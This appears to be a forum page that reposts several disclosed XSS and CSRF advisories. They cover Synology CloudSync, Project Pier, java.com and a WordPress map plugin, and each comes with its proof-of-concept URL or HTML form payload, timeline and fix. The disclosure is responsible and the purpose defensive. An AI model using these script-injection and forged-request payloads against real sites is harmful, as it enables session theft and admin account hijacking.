public cloud (like DropBox, GoogleDrive, etc.), there is multiple request through the OAuth protocol. Synology's OAuth page is opened to check the perms of the public cloud. It's possible to inject JavaScript into this context. With the control of this context, an attacker can catch and control the OAuth exchanges and validation. PoC: https://update.synology.com/CloudSync/db.php?state=https%3A%2F%2Fwww.asafety.fr<script>alert('Reflected XSS - Yann CAM @asafety');</script>&code=pIBf5bHN8zMAAAAAAAABRU0-iCumtCrexU63hCMeguX Screenshots : ====================================================================== - http://www.asafety.fr/data/20141123-RXSS_synology_synetis_001.png - http://www.asafety.fr/data/20141123-RXSS_synology_asafety_002.png Solution: ====================================================================== Fixed by Synology security team. Additional resources / article and screenshots : ====================================================================== - https://www.synology.com/ - ASafety » Page non trouvée - http://www.synetis.com Report timeline : ====================================================================== 2014-11-23 : Synology security team alerted with details and PoC. 2014-11-25 : Synology response and ack. 2014-11-26 : Vulnerability confirmed and fixed by Synology security team. 2014-11-26 : ASafety confirms the fix. 2014-11-27 : Synology thanks the confirmation. 2015-04-03 : ASafety public article 2015-04-03 : Public advisory Credits : ====================================================================== 88888888 88 888 88 88 888 88 88 788 Z88 88 88.888888 8888888 888888 88 8888888. 888888. 88 88 888 Z88 88 88 88 88 88 88 8888888 88 88 88 88 88 88 88 88 888 888 88 88 88 88 88888888888 88 88 888888 88 88 88 8. 88 88 88 88 88 888 888 ,88 8I88 88 88 88 88 88 88 .88 .88 ?8888888888. 888 88 88 88888888 8888 88 =88888888 888. 88 88 www.synetis.com 8888 Consulting firm in management and information security Yann CAM - Security Consultant @ Synetis | ASafety -- SYNETIS | ASafety CONTACT: www.synetis.com | www.asafety.fr Source: http://packetstorm.wowhacker.com/1504-exploits/synology-xss.txt
  20. I was doing my RASP (Runtime Application Self-Protection) module testing on the latest version of Project Pier i.e. 0.8.8 SP2 yesterday and found an XSS vulnerability in search. http://<server>/public/index.php?c=project&a=search&1427642606&active_project=1&search_for=%3CScRiPt%3Eprompt%28%22This%20website%20has%20simple%20exploitable%20XSS.%22%29%3C%2FScRiPt%3E <http://www.prop.com/public/index.php?c=project&a=search&1427642606&active_project=1&search_for=%3CScRiPt%3Eprompt%28%22This%20website%20has%20simple%20exploitable%20XSS.%22%29%3C%2FScRiPt%3E> The xss occurs after authentication. Thanks, Jaydeep Dave Source
  21. Nu am stat sa fac poza am sa postez doar raspunsul lor. Pm cine vrea sa stie unde era si alte detalii. 2x XSS si CSRF. Foarte de treaba baietii ( si fetele ) au raspuns rapid si in vreo 30 min era totul fixat.
  22. ###################################################################### # Exploit Title: Java.com RXSS and DOM-XSS # Date: 01/04/2015 # Author: Yann CAM @ Synetis - ASafety # Vendor or Software Link: java.com: Java + You # Version: / # Category: Reflected Cross Site Scripting and DOM based XSS # Google dork: # Tested on: Java.com main domain ###################################################################### Java description : ====================================================================== As of 2015, Java is one of the most popular programming languages in use, particularly for client-server web applications, with a reported 9 million developers. Java was originally developed by James Gosling at Sun Microsystems (which has since been acquired by Oracle Corporation) and released in 1995 as a core component of Sun Microsystems' Java platform. The language derives much of its syntax from C and C++, but it has fewer low-level facilities than either of them. Java.com is the main website to acquire Java JRE or JDK software. RXSS Vulnerability description - PoC n°1 : ====================================================================== A reflected XSS is available in the java.com main domain. Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Java portals, or capture Java's users credentials such cookies. It's also possible to forge a fake Java's page with this XSS to provide a backdoored version of softwares to users. This reflected XSS is on GET "n" variable and is not properly sanitized before being used to his page. Tested on Firefox 32.0. PoC: https://www.java.com/fr/download/faq/index_general.xml?n=20">2</a><script>alert(/Yann CAM @asafety_www.synetis.com/);</script>?printFriendly=true Screenshots : ====================================================================== - http://www.asafety.fr/data/20141025-java.com_DOMXSS-01.png - http://www.asafety.fr/data/20141025-java.com_DOMXSS-02.png - http://www.asafety.fr/data/20141025-java.com_DOMXSS-03.png - http://www.asafety.fr/data/20141025-java.com_Reflected_XSS-01.png - http://www.asafety.fr/data/20141025-java.com_Reflected_XSS-02.png Solution: ====================================================================== Fixed by Oracle/Java Security Team. Additional resources : ====================================================================== - http://www.java.com/ - http://www.oracle.com/ - http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html - http://www.asafety.fr/actualites-news/contribution-java-com-dom-xss-reflected-xss - http://www.synetis.com Report timeline : ====================================================================== 2014-10-25 : Oracle/Java Team alerted with details and PoC. 2014-10-27 : Oracle/Java response and confirm vulnerabilities. 2014-12-23 : Vulnerabilities seems to be fixed. 2015-04-01 : Public advisory Credits : ====================================================================== 88888888 88 888 88 88 888 88 88 788 Z88 88 88.888888 8888888 888888 88 8888888. 888888. 88 88 888 Z88 88 88 88 88 88 88 8888888 88 88 88 88 88 88 88 88 888 888 88 88 88 88 88888888888 88 88 888888 88 88 88 8. 88 88 88 88 88 888 888 ,88 8I88 88 88 88 88 88 88 .88 .88 ?8888888888. 888 88 88 88888888 8888 88 =88888888 888. 88 88 www.synetis.com 8888 Consulting firm in management and information security Yann CAM - Security Consultant @ Synetis | ASafety -- SYNETIS | ASafety CONTACT: www.synetis.com | www.asafety.fr Source: http://packetstorm.wowhacker.com/1504-exploits/javacom-xss.txt
  23. =============================================================================== CSRF/Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin =============================================================================== . contents:: Table Of Content Overview ======== * Title :Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin * Author: Kaustubh G. Padwad * Plugin Homepage: https://wordpress.org/plugins/ab-google-map-travel/ * Severity: HIGH * Version Affected: Version 3.4 and mostly prior to it * Version Tested : Version 3.4 * version patched: 4.0 * CVE ID : CVE-2015-2755 Description =========== Vulnerable Parameter -------------------- * Latitude: * Longitude: * Map Width: * Map Height: * Map Zoom: * And all Input Boxes About Vulnerability ------------------- This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. Vulnerability Class =================== Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) ========================= After installing the plugin After installing the plugin 1. Goto settings -> Google Map Travel 2. Insert this payload ## "> <script>+-+-1-+-+alert(document.cookie)</script> ## Into Any above mention Vulnerable parameter Save settings and see XSS in action 3. Visit Google Map Travel settings page of this plugin anytime later and you can see the script executing as it is stored. Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below <html> <body> <form action="http://localhost/wordpress/wp-admin/admin.php?page=ab_map_options" method="POST"> <input type="hidden" name="lat" value=""> <script>+-+-1-+-+alert(document.cookie)</script>" /> <input type="hidden" name="long" value="76.26730" /> <input type="hidden" name="lang" value="en" /> <input type="hidden" name="map_width" value="500" /> <input type="hidden" name="map_height" value="300" /> <input type="hidden" name="zoom" value="7" /> <input type="hidden" name="day_less_five_fare" value="llllll" /> <input type="hidden" name="day_more_five_fare" value="1.5" /> <input type="hidden" name="less_five_fare" value="3" /> <input type="hidden" name="more_five_fare" value="2.5" /> <input type="hidden" name="curr_format" value="$" /> <input type="hidden" name="submit" value="Update Settings" /> <input type="submit" value="Submit request" /> </form> </body> </html> . image:: csrf.jpeg :height: 1000 px :width: 1000 px :scale: 100 % :alt: XSS POC :align: center Mitigation ========== Update to version 4.0 Change Log ========== https://wordpress.org/plugins/ab-google-map-travel/changelog/ Disclosure ========== 07-March-2015 Reported to Developer 11-March-2015 Reported to Wordpress 11-March-2015 Acknowledgement from Developer 16-March-2015 Wordpress reviwed and publish the updated plugin. 16-March-2015 Requested for CVE ID 27-March-2015 CVE Assign 28-March-2015 Reposted with CVE ID credits ======= * Kaustubh Padwad * Information Security Researcher * kingkaustubh@me.com * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad Source: http://dl.packetstormsecurity.net/1503-exploits/wpabgmt-xssxsrf.txt
×
×
  • Create New...